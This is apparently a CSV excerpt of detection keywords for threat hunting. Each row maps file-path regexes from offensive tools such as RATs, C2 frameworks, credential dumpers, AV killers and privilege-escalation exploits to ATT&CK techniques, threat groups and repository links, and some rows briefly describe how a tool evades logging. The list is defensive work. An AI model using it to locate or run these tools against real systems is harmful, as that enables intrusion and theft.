"*\ReflectiveLoader.cpp*",".{0,1000}\\ReflectiveLoader\.cpp.{0,1000}","offensive_tool_keyword","Recon-AD","AD recon tool based on ADSI and reflective DLL","T1087 - T1069 - T1082 - T1016 - T1033 - T1046 - T1135","TA0007 - TA0003 - TA0004","N/A","N/A","Discovery","https://github.com/outflanknl/Recon-AD","1","0","N/A","N/A","8","4","326","55","2019-10-20T21:49:39Z","2019-10-20T21:09:41Z","17878"
"*\ReflectivePick.cpp*",".{0,1000}\\ReflectivePick\.cpp.{0,1000}","offensive_tool_keyword","Powerpick","allowing the execution of Powershell functionality without the use of Powershell.exe","T1059.001 - T1059.003 - T1086 - T1027.001","TA0005 - TA0002","N/A","Black Basta - Dispossessor","Defense Evasion","https://github.com/PowerShellEmpire/PowerTools","1","0","N/A","N/A","10","10","2106","815","2021-12-28T21:00:42Z","2014-03-06T14:49:51Z","17879"
"*\ReflectivePick_x64.dll*",".{0,1000}\\ReflectivePick_x64\.dll.{0,1000}","offensive_tool_keyword","Powerpick","allowing the execution of Powershell functionality without the use of Powershell.exe","T1059.001 - T1059.003 - T1086 - T1027.001","TA0005 - TA0002","N/A","Black Basta - Dispossessor","Defense Evasion","https://github.com/PowerShellEmpire/PowerTools","1","0","N/A","N/A","10","10","2106","815","2021-12-28T21:00:42Z","2014-03-06T14:49:51Z","17880"
"*\ReflectivePick_x86.dll*",".{0,1000}\\ReflectivePick_x86\.dll.{0,1000}","offensive_tool_keyword","Powerpick","allowing the execution of Powershell functionality without the use of Powershell.exe","T1059.001 - T1059.003 - T1086 - T1027.001","TA0005 - TA0002","N/A","Black Basta - Dispossessor","Defense Evasion","https://github.com/PowerShellEmpire/PowerTools","1","0","N/A","N/A","10","10","2106","815","2021-12-28T21:00:42Z","2014-03-06T14:49:51Z","17881"
"*\reg_recover-rs.exe*",".{0,1000}\\reg_recover\-rs\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002  - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tool","https://github.com/joaoviictorti/RustRedOps","1","0","N/A","N/A","10","10","1548","176","2025-04-20T18:50:04Z","2023-11-29T16:07:06Z","17883"
"*\RegfDenyTSConnections.ps1*",".{0,1000}\\RegfDenyTSConnections\.ps1.{0,1000}","offensive_tool_keyword","EventLogMaster","Cobalt Strike Plugin - RDP Log Forensics & Clearing","T1070.001 - T1070.003 - T1070.004 - T1563.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/QAX-A-Team/EventLogMaster","1","0","N/A","N/A","6","4","361","73","2019-12-23T10:31:35Z","2019-12-17T05:07:09Z","17884"
"*\RegHiveBackup.cfg*",".{0,1000}\\RegHiveBackup\.cfg.{0,1000}","offensive_tool_keyword","RegHiveBackup","backup the Registry files on your system into the specified folder","T1012 - T1596 - T1003","TA0006 - TA0009","N/A","N/A","Collection","https://www.nirsoft.net/alpha/reghivebackup.zip","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","17885"
"*\reghivebackup.zip*",".{0,1000}\\reghivebackup\.zip.{0,1000}","offensive_tool_keyword","RegHiveBackup","backup the Registry files on your system into the specified folder","T1012 - T1596 - T1003","TA0006 - TA0009","N/A","N/A","Collection","https://www.nirsoft.net/alpha/reghivebackup.zip","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","17886"
"*\register dll.exe*",".{0,1000}\\register\sdll\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","17887"
"*\registry-read.py*",".{0,1000}\\registry\-read\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","17888"
"*\reg-query.py*",".{0,1000}\\reg\-query\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","17889"
"*\RegRdpPort.ps1*",".{0,1000}\\RegRdpPort\.ps1.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","17890"
"*\regread.lua*",".{0,1000}\\regread\.lua.{0,1000}","offensive_tool_keyword","OffensiveLua","Offensive Lua is a collection of offensive security scripts written in Lua with FFI","T1059  - T1218.011 - T1105 - T1021.002 - T1564.001 - T1112 - T1113 - T1204.002 - T1547.002","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0011","N/A","N/A","Exploitation tool","https://github.com/hackerhouse-opensource/OffensiveLua","1","0","N/A","N/A","8","2","184","25","2023-11-17T00:35:10Z","2023-10-25T17:21:13Z","17891"
"*\regwrite.lua*",".{0,1000}\\regwrite\.lua.{0,1000}","offensive_tool_keyword","OffensiveLua","Offensive Lua is a collection of offensive security scripts written in Lua with FFI","T1059  - T1218.011 - T1105 - T1021.002 - T1564.001 - T1112 - T1113 - T1204.002 - T1547.002","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0011","N/A","N/A","Exploitation tool","https://github.com/hackerhouse-opensource/OffensiveLua","1","0","N/A","N/A","8","2","184","25","2023-11-17T00:35:10Z","2023-10-25T17:21:13Z","17892"
"*\regwritedel.lua*",".{0,1000}\\regwritedel\.lua.{0,1000}","offensive_tool_keyword","OffensiveLua","Offensive Lua is a collection of offensive security scripts written in Lua with FFI","T1059  - T1218.011 - T1105 - T1021.002 - T1564.001 - T1112 - T1113 - T1204.002 - T1547.002","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0011","N/A","N/A","Exploitation tool","https://github.com/hackerhouse-opensource/OffensiveLua","1","0","N/A","N/A","8","2","184","25","2023-11-17T00:35:10Z","2023-10-25T17:21:13Z","17893"
"*\Relay\Attacks\ShadowCred.cs*",".{0,1000}\\Relay\\Attacks\\ShadowCred\.cs.{0,1000}","offensive_tool_keyword","KrbRelayUp","a universal no-fix local privilege escalation in windows domain environments where LDAP signing is not enforced (the default settings).","T1558 - T1210","TA0004 - TA0003","N/A","Dispossessor - Back Basta","Privilege Escalation","https://github.com/Dec0ne/KrbRelayUp","1","0","N/A","N/A","10","10","1580","209","2022-08-06T12:23:58Z","2022-04-24T21:33:00Z","17894"
"*\Release\CheckPort.pdb*",".{0,1000}\\Release\\CheckPort\.pdb.{0,1000}","offensive_tool_keyword","CheckPort","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","CheckPort","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","17895"
"*\Release\CheckPort.pdb*",".{0,1000}\\Release\\CheckPort\.pdb.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","CheckPort","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","17896"
"*\Release\gmer.pdb*",".{0,1000}\\Release\\gmer\.pdb.{0,1000}","offensive_tool_keyword","gmer","rootkit detector abused by attackers to disable security software","T1014 - T1562.001","TA0005","N/A","BlackSuit - Royal - PLAY - LockBit - Bassterlord* - Conti - 8BASE - TargetCompany - Hive - Avaddon","Defense Evasion","gmer.net","1","0","#content","N/A","9","10","N/A","N/A","N/A","N/A","17897"
"*\Release\Injected.dll*",".{0,1000}\\Release\\Injected\.dll.{0,1000}","offensive_tool_keyword","ShimMe","Injects a DLL into a suspended process running as SYSTEM via the OfficeClickToRun service for privilege escalation - Shim Injector: Injects a DLL into a process by modifying shim data in memory without creating or registering new SDB files to evade detection.","T1055 - T1053 - T1548.002 - T1078 - T1546 - T1070","TA0004 - TA0005 - TA0006 - TA0009","N/A","N/A","Privilege Escalation","https://github.com/deepinstinct/ShimMe","1","0","N/A","N/A","9","2","140","20","2024-10-29T07:33:38Z","2024-08-04T10:03:28Z","17898"
"*\Release\SharpCradle.pdb*",".{0,1000}\\Release\\SharpCradle\.pdb.{0,1000}","offensive_tool_keyword","SharpPack","collection of C# tools that include functionalities like Kerberoasting - ticket manipulation - Mimikatz - privilege escalation - domain enumeration and more","T1558.003 - T1003 - T1059.004 - T1078 - T1212 - T1087 - T1016 - T1071 - T1555 - T1203","TA0003 - TA0004 - TA0006 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation tool","https://github.com/Lexus89/SharpPack","1","0","#content","N/A","10","1","78","19","2019-08-12T13:25:25Z","2018-10-01T12:45:16Z","17899"
"*\Release\SharpSploitConsole.pdb*",".{0,1000}\\Release\\SharpSploitConsole\.pdb.{0,1000}","offensive_tool_keyword","SharpPack","collection of C# tools that include functionalities like Kerberoasting - ticket manipulation - Mimikatz - privilege escalation - domain enumeration and more","T1558.003 - T1003 - T1059.004 - T1078 - T1212 - T1087 - T1016 - T1071 - T1555 - T1203","TA0003 - TA0004 - TA0006 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation tool","https://github.com/Lexus89/SharpPack","1","0","#content","N/A","10","1","78","19","2019-08-12T13:25:25Z","2018-10-01T12:45:16Z","17900"
"*\Release\SharpView.pdb*",".{0,1000}\\Release\\SharpView\.pdb.{0,1000}","offensive_tool_keyword","SharpPack","collection of C# tools that include functionalities like Kerberoasting - ticket manipulation - Mimikatz - privilege escalation - domain enumeration and more","T1558.003 - T1003 - T1059.004 - T1078 - T1212 - T1087 - T1016 - T1071 - T1555 - T1203","TA0003 - TA0004 - TA0006 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation tool","https://github.com/Lexus89/SharpPack","1","0","#content","N/A","10","1","78","19","2019-08-12T13:25:25Z","2018-10-01T12:45:16Z","17901"
"*\Release\SpoolFool.pdb*",".{0,1000}\\Release\\SpoolFool\.pdb.{0,1000}","offensive_tool_keyword","SpoolFool","Exploit for CVE-2022-21999 - Windows Print Spooler Elevation of Privilege Vulnerability (LPE)","T1068 - T1055 - T1059.003","TA0004 - TA0005 - TA0003","","Dispossessor","Privilege Escalation","https://github.com/ly4k/SpoolFool","1","0","N/A","N/A","9","8","788","160","2022-02-09T16:54:09Z","2022-02-08T17:25:44Z","17902"
"*\remot shell.pl*",".{0,1000}\\remot\sshell\.pl.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","N/A","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","17910"
"*\RemoteAccessPolicyEnumeration.ps1*",".{0,1000}\\RemoteAccessPolicyEnumeration\.ps1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","0","N/A","N/A","10","10","5221","826","2025-04-17T15:08:42Z","2017-01-06T11:18:20Z","17930"
"*\RemoteCamera.dll*",".{0,1000}\\RemoteCamera\.dll.{0,1000}","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","Malware","https://github.com/qwqdanchun/DcRat","1","0","N/A","N/A","10","10","968","332","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z","17931"
"*\remotedesktop.exe*",".{0,1000}\\remotedesktop\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","17938"
"*\RemoteHashRetrieval.ps1*",".{0,1000}\\RemoteHashRetrieval\.ps1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","0","N/A","N/A","10","10","5221","826","2025-04-17T15:08:42Z","2017-01-06T11:18:20Z","17940"
"*\RemoteKrbRelay\*",".{0,1000}\\RemoteKrbRelay\\.{0,1000}","offensive_tool_keyword","RemoteKrbRelay","similar to KrbRelay and KrbRelayUp but With RemoteKrbRelay this can be done remotely","T1550.004 - T1557.001 - T1021.005 - T1105","TA0008 - TA0005","N/A","N/A","Lateral Movement","https://github.com/CICADA8-Research/RemoteKrbRelay","1","0","N/A","N/A","10","6","581","90","2024-06-30T14:08:50Z","2024-06-24T17:38:46Z","17946"
"*\RemoteKrbRelay-main*",".{0,1000}\\RemoteKrbRelay\-main.{0,1000}","offensive_tool_keyword","RemoteKrbRelay","similar to KrbRelay and KrbRelayUp but With RemoteKrbRelay this can be done remotely","T1550.004 - T1557.001 - T1021.005 - T1105","TA0008 - TA0005","N/A","N/A","Lateral Movement","https://github.com/CICADA8-Research/RemoteKrbRelay","1","0","N/A","N/A","10","6","581","90","2024-06-30T14:08:50Z","2024-06-24T17:38:46Z","17947"
"*\RemoteMaint.sln*",".{0,1000}\\RemoteMaint\.sln.{0,1000}","offensive_tool_keyword","impacketremoteshell","install a legit application and interface with it over smb w/o the signature of cmd.exe / powershell.exe being called or the redirection typically used by those techniques","T1077 - T1059.007 - T1569.001","TA0008 - TA0005 - TA0040","N/A","N/A","Lateral Movement","https://github.com/trustedsec/The_Shelf","1","0","N/A","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","17948"
"*\RemoteMaint.vcxproj*",".{0,1000}\\RemoteMaint\.vcxproj.{0,1000}","offensive_tool_keyword","impacketremoteshell","install a legit application and interface with it over smb w/o the signature of cmd.exe / powershell.exe being called or the redirection typically used by those techniques","T1077 - T1059.007 - T1569.001","TA0008 - TA0005 - TA0040","N/A","N/A","Lateral Movement","https://github.com/trustedsec/The_Shelf","1","0","N/A","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","17949"
"*\RemoteMaintsvc.exe*",".{0,1000}\\RemoteMaintsvc\.exe.{0,1000}","offensive_tool_keyword","impacketremoteshell","install a legit application and interface with it over smb w/o the signature of cmd.exe / powershell.exe being called or the redirection typically used by those techniques","T1077 - T1059.007 - T1569.001","TA0008 - TA0005 - TA0040","N/A","N/A","Lateral Movement","https://github.com/trustedsec/The_Shelf","1","0","N/A","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","17950"
"*\RemoteMaintsvc.exe*",".{0,1000}\\RemoteMaintsvc\.exe.{0,1000}","offensive_tool_keyword","impacketremoteshell","install a legit application and interface with it over smb w/o the signature of cmd.exe / powershell.exe being called or the redirection typically used by those techniques","T1077 - T1059.007 - T1569.001","TA0008 - TA0005 - TA0040","N/A","N/A","Lateral Movement","https://github.com/trustedsec/The_Shelf","1","0","N/A","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","17951"
"*\RemotePenetration.exe*",".{0,1000}\\RemotePenetration\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","18004"
"*\RemotePotato0.cpp*",".{0,1000}\\RemotePotato0\.cpp.{0,1000}","offensive_tool_keyword","RemotePotato0","Windows Privilege Escalation from User to Domain Admin.","T1078.002 - T1078.003 - T1078.004","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/antonioCoco/RemotePotato0","1","0","N/A","N/A","10","10","1382","215","2022-12-18T01:52:53Z","2021-02-08T22:02:19Z","18005"
"*\RemotePotato0.sln*",".{0,1000}\\RemotePotato0\.sln.{0,1000}","offensive_tool_keyword","RemotePotato0","Windows Privilege Escalation from User to Domain Admin.","T1078.002 - T1078.003 - T1078.004","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/antonioCoco/RemotePotato0","1","0","N/A","N/A","10","10","1382","215","2022-12-18T01:52:53Z","2021-02-08T22:02:19Z","18006"
"*\RemotePotato0.zip*",".{0,1000}\\RemotePotato0\.zip.{0,1000}","offensive_tool_keyword","RemotePotato0","Windows Privilege Escalation from User to Domain Admin.","T1078.002 - T1078.003 - T1078.004","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/antonioCoco/RemotePotato0","1","0","N/A","N/A","10","10","1382","215","2022-12-18T01:52:53Z","2021-02-08T22:02:19Z","18007"
"*\RemotePotato0-main.zip*",".{0,1000}\\RemotePotato0\-main\.zip.{0,1000}","offensive_tool_keyword","RemotePotato0","Windows Privilege Escalation from User to Domain Admin.","T1078.002 - T1078.003 - T1078.004","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/antonioCoco/RemotePotato0","1","0","N/A","N/A","10","10","1382","215","2022-12-18T01:52:53Z","2021-02-08T22:02:19Z","18008"
"*\RemotePotato0-main\*",".{0,1000}\\RemotePotato0\-main\\.{0,1000}","offensive_tool_keyword","RemotePotato0","Windows Privilege Escalation from User to Domain Admin.","T1078.002 - T1078.003 - T1078.004","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/antonioCoco/RemotePotato0","1","0","N/A","N/A","10","10","1382","215","2022-12-18T01:52:53Z","2021-02-08T22:02:19Z","18009"
"*\remoteshell.py*",".{0,1000}\\remoteshell\.py.{0,1000}","offensive_tool_keyword","impacketremoteshell","install a legit application and interface with it over smb w/o the signature of cmd.exe / powershell.exe being called or the redirection typically used by those techniques","T1077 - T1059.007 - T1569.001","TA0008 - TA0005 - TA0040","N/A","N/A","Lateral Movement","https://github.com/trustedsec/The_Shelf","1","0","N/A","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","18010"
"*\remove_allowlongscriptruntime.py*",".{0,1000}\\remove_allowlongscriptruntime\.py.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","N/A","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","18016"
"*\remove_allowlongscriptruntime.txt*",".{0,1000}\\remove_allowlongscriptruntime\.txt.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","N/A","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","18017"
"*\Remove_defender_moduled\*",".{0,1000}\\Remove_defender_moduled\\.{0,1000}","offensive_tool_keyword","windows-defender-remover","hacktool used to remove Windows Defender","T1089 - T1562.001 - T1562.004","TA0005 - TA0040","N/A","Black Basta","Defense Evasion","https://github.com/ionuttbara/windows-defender-remover","1","0","N/A","N/A","10","10","5266","354","2025-02-13T20:21:07Z","2021-08-13T20:44:46Z","18018"
"*\RemoveItemCommand.cs",".{0,1000}\\RemoveItemCommand\.cs","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","0","N/A","N/A","10","10","977","138","2025-04-11T09:25:41Z","2018-11-28T21:07:51Z","18019"
"*\rentdrv.log*",".{0,1000}\\rentdrv\.log.{0,1000}","offensive_tool_keyword","GhostDriver","GhostDriver is a Rust-built AV killer tool using BYOVD","T1562.001  - T1211 - T1055.001","TA0005 - TA0002","N/A","Black Basta","Defense Evasion","https://github.com/BlackSnufkin/GhostDriver","1","0","N/A","N/A","9","3","270","38","2023-12-12T13:52:32Z","2023-12-02T23:56:13Z","18020"
"*\request_shellcode.exe*",".{0,1000}\\request_shellcode\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002  - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tool","https://github.com/joaoviictorti/RustRedOps","1","0","N/A","N/A","10","10","1548","176","2025-04-20T18:50:04Z","2023-11-29T16:07:06Z","18021"
"*\ResolveDnsNameCommand.cs",".{0,1000}\\ResolveDnsNameCommand\.cs","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","0","N/A","N/A","10","10","977","138","2025-04-11T09:25:41Z","2018-11-28T21:07:51Z","18024"
"*\Resources\Disks-NoEncryption.txt*",".{0,1000}\\Resources\\Disks\-NoEncryption\.txt.{0,1000}","offensive_tool_keyword","MicroBurst","A collection of scripts for assessing Microsoft Azure security","T1583 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","Scattered Spider*","Exploitation tool","https://github.com/NetSPI/MicroBurst","1","0","N/A","N/A","6","10","2143","320","2025-03-19T17:07:24Z","2018-07-16T16:47:20Z","18025"
"*\Resources\mimikatz.exe*",".{0,1000}\\Resources\\mimikatz\.exe.{0,1000}","offensive_tool_keyword","DeadPotato","DeadPotato is a windows privilege escalation utility from the Potato family of exploits leveraging the SeImpersonate right to obtain SYSTEM privileges","T1134.001 - T1068  - T1055 - T1546.015","TA0004 - TA0006 - TA0011","N/A","N/A","Privilege Escalation","https://github.com/lypd0/DeadPotato","1","0","N/A","N/A","10","4","382","45","2024-08-17T06:08:29Z","2024-07-31T01:08:30Z","18026"
"*\resources\PROCEXP.sys*",".{0,1000}\\resources\\PROCEXP\.sys.{0,1000}","offensive_tool_keyword","Backstab","A tool to kill antimalware protected processes","T1562.001 - T1569 - T1059","TA0005 - TA0040 - TA0002","N/A","Black Basta - LockBit","Defense Evasion","https://github.com/Yaxser/Backstab","1","0","N/A","N/A","10","10","1435","244","2021-06-19T20:01:52Z","2021-06-15T16:02:11Z","18027"
"*\Responder-Session.log*",".{0,1000}\\Responder\-Session\.log.{0,1000}","offensive_tool_keyword","responder","LLMNR. NBT-NS and MDNS poisoner","T1557.001 - T1171 - T1547.011 - T1040","TA0011 - TA0006 - TA0007","N/A","Lazarus Group - APT28 - FANCY BEAR - EMBER BEAR","Sniffing & Spoofing","https://github.com/lgandx/Responder-Windows/","1","0","N/A","N/A","N/A","6","523","137","2024-07-30T11:10:05Z","2015-02-07T22:59:04Z","18028"
"*\Restore Your Files.txt*",".{0,1000}\\Restore\sYour\sFiles\.txt.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","N/A","ransom notes","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","18035"
"*\RESTORE_FILES.txt*",".{0,1000}\\RESTORE_FILES\.txt.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","N/A","ransom notes","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","18036"
"*\RESTORE-FILES-Q7ILknn7k.txt*",".{0,1000}\\RESTORE\-FILES\-Q7ILknn7k\.txt.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","N/A","ransom notes","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","18037"
"*\restoresig.py*",".{0,1000}\\restoresig\.py.{0,1000}","offensive_tool_keyword","LetMeowIn","A sophisticated covert Windows-based credential dumper using C++ and MASM x64.","T1003 - T1055.011 - T1148","TA0006","N/A","N/A","Credential Access","https://github.com/Meowmycks/LetMeowIn","1","0","N/A","N/A","10","5","401","70","2024-07-08T15:58:37Z","2024-04-09T16:33:27Z","18038"
"*\revbshell-master*",".{0,1000}\\revbshell\-master.{0,1000}","offensive_tool_keyword","revbshell","ReVBShell - Reverse VBS Shell","T1059.005 - T1573.001 - T1105","TA0011 - TA0010","N/A","N/A","C2","https://github.com/bitsadmin/revbshell","1","0","N/A","N/A","10","10","81","27","2019-10-08T12:00:05Z","2017-02-19T18:58:52Z","18039"
"*\Revenge-RAT v*.exe*",".{0,1000}\\Revenge\-RAT\sv.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","18040"
"*\reverse.exe*",".{0,1000}\\reverse\.exe.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","N/A","10","10","3312","702","2024-10-31T22:38:04Z","2021-02-27T00:53:13Z","18041"
